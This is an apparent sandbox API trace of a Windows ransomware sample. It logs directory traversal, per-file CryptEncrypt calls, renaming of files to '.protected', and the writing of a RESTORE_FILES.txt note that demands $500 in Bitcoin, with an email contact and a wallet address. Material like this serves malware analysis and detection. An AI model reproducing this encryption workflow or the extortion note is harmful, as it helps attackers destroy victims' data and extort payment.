[0095.010] CloseHandle (hObject=0xd8) returned 1 [0095.010] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Windows") returned -1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Program Files") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Program Files (x86)") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="$Recycle.bin") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="System Volume Information") returned -1 
[0095.010] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned 54 [0095.010] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0095.010] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0095.010] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 56 [0095.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0095.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.010] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\.") returned 56 [0095.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.011] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.011] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.011] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.011] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.011] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\..") returned 57 [0095.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.011] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.011] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.011] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Windows") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files (x86)") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="$Recycle.bin") returned 1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="System Volume Information") returned -1 [0095.011] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrIW (lpFirst="CREDHIST", lpSrch=".protected") returned 0x0 [0095.012] lstrcmpW (lpString1="CREDHIST", lpString2="RESTORE_FILES.txt") returned -1 [0095.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.012] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0095.012] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".rar") returned 0x0 [0095.012] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".zip") returned 0x0 [0095.012] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x18, lpOverlapped=0x0) returned 1 [0095.013] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x18, lpOverlapped=0x0) returned 1 [0095.013] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0095.014] CloseHandle (hObject=0x14c) returned 1 [0095.014] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected") returned 73 [0095.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.protected")) returned 1 [0095.014] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Windows") returned -1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files (x86)") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="$Recycle.bin") returned 1 [0095.014] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="System Volume Information") returned -1 [0095.014] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 100 [0095.014] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0095.014] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0095.014] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned 102 [0095.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0095.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.") returned 102 [0095.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.016] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.016] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.016] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\..") returned 103 [0095.016] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.016] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.016] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Windows") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files (x86)") returned -1 [0095.016] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="$Recycle.bin") returned 1 [0095.017] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="System Volume Information") returned -1 [0095.017] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrIW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".protected") returned 0x0 [0095.017] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="RESTORE_FILES.txt") returned -1 [0095.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".rar") returned 0x0 [0095.017] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 137 [0095.017] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".zip") returned 0x0 [0095.018] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0095.018] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.019] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0095.019] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.019] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.019] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.019] CloseHandle (hObject=0x150) returned 1 [0095.019] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected") returned 147 [0095.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected")) returned 1 [0095.020] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 [0095.020] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 
[0095.020] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0095.020] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 [0095.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0095.020] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 110 [0095.020] StrStrW (lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0095.020] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0095.021] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0095.021] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.021] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.021] CloseHandle (hObject=0x150) returned 1 [0095.021] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected") returned 120 [0095.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.protected")) returned 1 [0095.022] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.022] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.022] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt") returned 118 [0095.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.023] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.023] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.023] lstrlenA 